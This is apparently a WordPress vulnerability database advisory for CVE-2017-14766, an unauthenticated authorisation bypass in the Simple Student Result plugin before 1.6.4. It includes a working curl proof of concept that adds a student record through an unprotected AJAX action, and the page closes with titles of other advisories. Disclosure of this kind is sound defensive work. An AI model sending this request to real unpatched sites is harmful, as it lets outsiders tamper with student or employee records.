Student Result or Employee Database < 1.6.4 – Auth Bypass | CVE 2017-14766 | Plugin Vulnerabilities

Description

The plugin does not have authorisation checks in its AJAX actions, allowing unauthenticated users to perform unauthorised actions such as add students

Proof of Concept

curl -i -s -k  -X 'POST' -H 'User-Agent: Mozilla/5.0' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Referer: http://localhost/wp-admin/admin.php?page=ssr_add_results' --data-binary 'action=ssr_add_st_submit&rid=123&rn=456&stn=john&stfn=smith&stpy=2017&stcgpa=5.00&stsub=Subject+3&stpy2=01011990&stpy3=male&stpy4=address&stpy5=smith&stpy6=extra1&stpy7=extra2&upload_image=' 'https://localhost/wp-admin/admin-ajax.php'

Affects Plugins

simple-student-result

Fixed in 1.6.4

References

CVE

URL

https://limbenjamin.com/articles/simple-student-result-auth-bypass.html

URL

https://plugins.trac.wordpress.org/changeset/1733325/simple-student-result

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Submitter

Benjamin Lim

Submitter website

https://limbenjamin.com

Verified

No

WPVDB ID

bf9c8193-6dc4-4098-a0c7-c850ea8c2cca

Timeline

Publicly Published

2017-09-21 (about 8 years ago)

Added

2017-09-28 (about 8 years ago)

Last Updated

2022-07-27 (about 3 years ago)

Other

Published

Title

Published

2024-04-15

Title

Mega Addons For Elementor < 1.9 - Missing Authorization

Published

2023-08-15

Title

WP Remote Users Sync < 1.2.12 - Subscriber+ Log Access

Published

2026-03-30

Title

Truebooker - Appointment Booking and Scheduler Plugin < 1.1.5 - Sensitive Information Exposure via Views Files

Published

2025-04-17

Title

JetElements For Elementor < 2.7.4.2 - Missing Authorization

Published

2025-01-16

Title

AI Responsive Gallery Album <= 1.4 - Missing Authorization